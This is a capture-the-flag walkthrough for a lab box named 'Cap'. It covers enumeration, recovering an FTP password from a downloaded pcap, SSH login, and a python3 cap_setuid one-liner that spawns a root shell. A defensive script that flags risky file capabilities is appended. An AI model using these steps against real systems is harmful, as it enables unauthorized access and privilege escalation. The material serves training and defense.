
Cap


Enumeration



nmap -sV 10.129.228.42



Port 80 is open. Let's check it by entering the IP address in our browser.



gobuster dir -w /usr/share/dirb/wordlists/common.txt -u 10.129.228.42

Now let's open our browser again and check:

10.129.228.42/data
10.129.228.42/ip
10.129.228.42/netstat

10.129.228.42/data seems interesting. I tried several combinations but found something interesting with 10.129.228.42/data/0


If you type 10.129.228.42/data/0 in your browser, you find a file to download.

Download the file. It is called 0.pcap


Looks like a pcap file, so let's open Wireshark and look more into it.


On the Parrot machine, go to Applications --> Pentesting --> Sniffing and Spoofing --> wireshark



Once Wireshark loads, click on File --> Open


Locate your 0.pcap file and click on open



In the filter field, type FTP to filter only the FTP protocol. We can see the password used by Nathan in plaintext!


Foothold


We know that ssh is open too so let's try that:

ssh nathan@10.129.228.42

You are prompted to enter a password. Enter the password we just found.


The credentials worked and we are in.


ls

cat user.txt

You got your flag!



Privilege Escalation


id

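getcap -r / 2>/dev/null

This lists every file on the system that has Linux file capabilities set. The next command can call os.setuid(0) from an unprivileged account only if the python3 binary carries the cap_setuid capability.

python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'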

Now we are root!


id


ls


cd /root

ls

cat root.txt

Now we got the root flag too!


Congratulations!
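
The getcap step from the Privilege Escalation section, turned into a defender's audit. This is an added example, not part of the original walkthrough: it reads getcap output and reports binaries that hold a root-equivalent capability in their effective or permitted set. The function names, the capability list and the sample lines are this example's own choices.

```shell
#!/bin/sh
# Capabilities that let a non-root process become or act as root
# (this list is a choice made for this example, not an official one).
RISKY_CAPS='cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_dac_override|cap_dac_read_search|cap_chown|cap_fowner'

# Constructed sample of getcap output, in both the older libcap style
# ("path = caps+flags") and the newer one ("path caps=flags").
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/python3 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl cap_setuid=ep
/usr/bin/mtr-packet cap_net_raw=ep
/opt/tool cap_sys_admin=i
EOF
}

# Reads getcap output on stdin, prints "path<TAB>capability" per finding.
flag_risky_caps() {
    awk -v risky="^(${RISKY_CAPS})\$" '
    # Find where the capability text starts: " = cap_x" (old libcap),
    # " cap_x" (newer libcap) or " =ep" (every capability granted).
    match($0, / (= )?(cap_|=)/) {
        path = substr($0, 1, RSTART - 1)
        spec = substr($0, RSTART + 1)
        sub(/^= /, "", spec)
        nclauses = split(spec, clause, " ")
        for (i = 1; i <= nclauses; i++) {
            k = match(clause[i], /[+=]/)
            if (k == 0) continue
            names = substr(clause[i], 1, k - 1)
            flags = substr(clause[i], k + 1)
            # Inheritable-only grants give nothing at exec time by themselves.
            if (flags !~ /[ep]/) continue
            if (names == "") { print path "\tALL"; continue }
            ncaps = split(names, cap, ",")
            for (j = 1; j <= ncaps; j++)
                if (cap[j] ~ risky) print path "\t" cap[j]
        }
    }'
}

sample_getcap_output | flag_risky_caps
```

On a real host, pipe `getcap -r / 2>/dev/null` into flag_risky_caps instead of the sample, and drop a grant that is not needed with `setcap -r <path>`.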




